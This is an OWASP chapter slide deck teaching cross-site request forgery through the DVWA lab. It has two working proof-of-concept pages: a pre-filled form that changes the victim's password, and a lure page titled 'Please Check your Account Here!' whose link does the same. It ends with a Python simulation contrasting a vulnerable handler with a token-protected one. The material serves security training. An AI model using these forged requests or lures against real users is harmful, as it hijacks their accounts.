CROSS SITE REQUEST FORGERY
UNDERSTANDING
John Patrick Lita - OWASP Manila Chapter President
Venue: Philippine Army, Cyber Security Division, Taguig City

OWASP Taguig Chapter
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
MEET THE PRESENTER
OWASP Manila Chapter President
Project Manager at Enterprise Linux Professionals
Owner of Active Security Training and Consultancy
Project leader for OWASP Online Academy
john.patrick.lita@owasp.org
CROSS SITE REQUEST FORGERY
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help from social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
CSRF ILLUSTRATION
[Figure, slides 4 to 9: two forms side by side, a "Regular Form" on the site and a "CSRF Form Template" hosted elsewhere, each with a "COMMENT HERE:" field and a POST button. The user submits "I AM AWESOME!" through the regular form and it is published as "Jaypee: I AM AWESOME!". A submission of "I AM NOOB!" sent through the CSRF form template is accepted in exactly the same way and published as "Jaypee: I AM NOOB!", attributed to Jaypee's session.]
CANNOT READ THE ANTI-CSRF
NO SERVER SIDE VALIDATION
REVIEWING THE FORM
CHECKING THE SOURCE CODE
CSRF DEMO
PREVENTION MEASURES THAT DO NOT WORK
CSRF TEMPLATE WEB INTERFACE
Copy the code of the CSRF Template and save it as an HTML file, then open the file with any browser you like, click the submit button and analyse the behaviour.

After that, try to log in. Please proceed to the next page (page 16) for the source code.
CSRF TEMPLATE SOURCE CODE
<!DOCTYPE html>
<html>
<head>
  <title>CSRF Template</title>
</head>
<body>
  <br>
  <!-- The form posts to the DVWA CSRF lab used in the talk; the victim's browser
       attaches its existing DVWA session cookie to this cross-site GET automatically -->
  <form action="http://172.16.157.129/dvwa/vulnerabilities/csrf/?" method="GET">
    New Password:<br>
    <input type="password" autocomplete="off" name="password_new" value="12345"><br>
    Confirm New Password:<br>
    <input type="password" autocomplete="off" name="password_conf" value="12345"><br>
    <input type="submit" value="Change" name="Change">
  </form>
</body>
</html>
PREVENTION MEASURES THAT DO NOT WORK
▸ Using a secret cookie
  Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end user intended to submit the request.
▸ Only accepting POST requests
  Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods by which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted on an attacker's website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks the form will do something else.
▸ Multi-step transactions
  Multi-step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, CSRF is possible.
▸ URL rewriting
  This might be seen as a useful CSRF prevention technique as the attacker cannot guess the victim's session ID. However, the user's session ID is exposed in the URL. We don't recommend fixing one security flaw by introducing another.
▸ HTTPS
  HTTPS does nothing to defend against CSRF.
CSRF DEMO
CSRF ATTACK USING SOCIAL ENGINEERING
One technique, or attack vector, is to perform a click jacking attack. To test this attack, proceed to the next page for the source code, then try executing it by clicking "Click Here!".
CSRF ATTACK USING SOCIAL ENGINEERING
<!DOCTYPE html>
<html>
<head>
  <title>Please Check your Account Here!</title>
</head>
<body>
  <h1>Check your account Here!</h1>
  <!-- A plain link: following it issues a top-level GET to the DVWA CSRF lab,
       and the browser attaches the victim's existing DVWA session cookie -->
  <a href="http://172.16.157.129/dvwa/vulnerabilities/csrf/?password_new=password&amp;password_conf=password&amp;Change=Change#">Click Here!</a>
</body>
</html>
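The following is an added example, not code from the slides or from DVWA: a small simulated password-change endpoint that replays the deck's forged requests (the link from the social-engineering slide, the auto-submitted POST from the "only accept POST" slide) against two handlers. The first mirrors the behaviour demonstrated in the demo, where only the session cookie is examined ("no server side validation"), and the second adds the per-session anti-CSRF token that a foreign page "cannot read", plus a method check and an Origin check as defence in depth. The session store, user table, the cookie name PHPSESSID, the field name user_token and the host attacker.example are all constructed or assumed here for the demonstration.

```python
import hmac
import secrets

SITE_ORIGIN = "http://172.16.157.129"   # the DVWA host the slides target
SESSIONS = {}                           # constructed in-memory session store: cookie value -> record
USERS = {"jaypee": "original"}          # constructed user table: username -> current password


class Request:
    """A request as the server receives it. The browser attaches the site's
    cookies to every request for that site, whatever page triggered it, and
    sets the Origin header itself (None on a top-level link navigation)."""

    def __init__(self, method, params, cookies, origin=None):
        self.method = method      # HTTP method
        self.params = params      # query string or form body fields
        self.cookies = cookies    # cookies the browser attached
        self.origin = origin      # Origin header, set by the browser, not by the page


def login(user):
    """Create a session with a fresh per-session anti-CSRF secret; return the cookie value."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def _session_of(req):
    return SESSIONS.get(req.cookies.get("PHPSESSID", ""))


def change_password_vulnerable(req):
    """The behaviour the deck demonstrates: the only credential examined is the
    session cookie, so any request the browser attaches it to is honoured."""
    sess = _session_of(req)
    if sess is None:
        return "403 not logged in"
    if req.params.get("password_new") != req.params.get("password_conf"):
        return "400 passwords differ"
    USERS[sess["user"]] = req.params["password_new"]
    return "200 password changed"


def change_password_hardened(req):
    """Same endpoint with the server-side validation the slides show to be missing."""
    sess = _session_of(req)
    if sess is None:
        return "403 not logged in"
    if req.method != "POST":
        return "405 state change must be POST"       # necessary but not sufficient on its own
    # Decisive check: a secret bound to this session that a foreign page cannot
    # read, compared in constant time so the comparison leaks nothing.
    if not hmac.compare_digest(req.params.get("user_token", ""), sess["csrf"]):
        return "403 missing or wrong anti-CSRF token"
    if req.origin is not None and req.origin != SITE_ORIGIN:
        return "403 cross-origin request"            # defence in depth via a browser-set header
    if req.params.get("password_new") != req.params.get("password_conf"):
        return "400 passwords differ"
    USERS[sess["user"]] = req.params["password_new"]
    return "200 password changed"


def run_scenarios():
    """Replay the deck's forged requests against both handlers and return
    {scenario: (vulnerable_status, hardened_status)} for inspection."""
    victim = login("jaypee")
    attacker = login("attacker")                     # the attacker holds an account of their own
    cookies = {"PHPSESSID": victim}                  # what the victim's browser sends to the site
    forged = {"password_new": "password", "password_conf": "password", "Change": "Change"}
    scenarios = {
        # the victim follows the "Click Here!" link: a top-level GET, no Origin header
        "link_get": Request("GET", forged, cookies),
        # a hidden form on the attacker's page auto-submits a POST with the same fields
        "auto_post": Request("POST", forged, cookies, origin="http://attacker.example"),
        # the attacker supplies the token from their own session; it is not the victim's
        "foreign_token": Request("POST", dict(forged, user_token=SESSIONS[attacker]["csrf"]),
                                 cookies, origin="http://attacker.example"),
        # the site's own form, carrying the token the site rendered into the page
        "genuine": Request("POST", dict(forged, user_token=SESSIONS[victim]["csrf"]),
                           cookies, origin=SITE_ORIGIN),
    }
    results = {}
    for name, req in scenarios.items():
        USERS["jaypee"] = "original"
        results[name] = (change_password_vulnerable(req), change_password_hardened(req))
    return results


if __name__ == "__main__":
    for name, (vuln, hard) in run_scenarios().items():
        print(f"{name:14} vulnerable: {vuln:22} hardened: {hard}")
```

The ordering of checks in the hardened handler is deliberate: the method check stops the link-based GET, the token check stops every forged request regardless of method or who sent it, and the Origin check only adds a second, independent signal. Note that the cookie is sent in all four scenarios, which is exactly why the "secret cookie" measure from the previous slide cannot distinguish the genuine submission from the forged ones.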
JOHN.PATRICK.LITA@OWASP.ORG
THANK YOU FOR
LISTENING
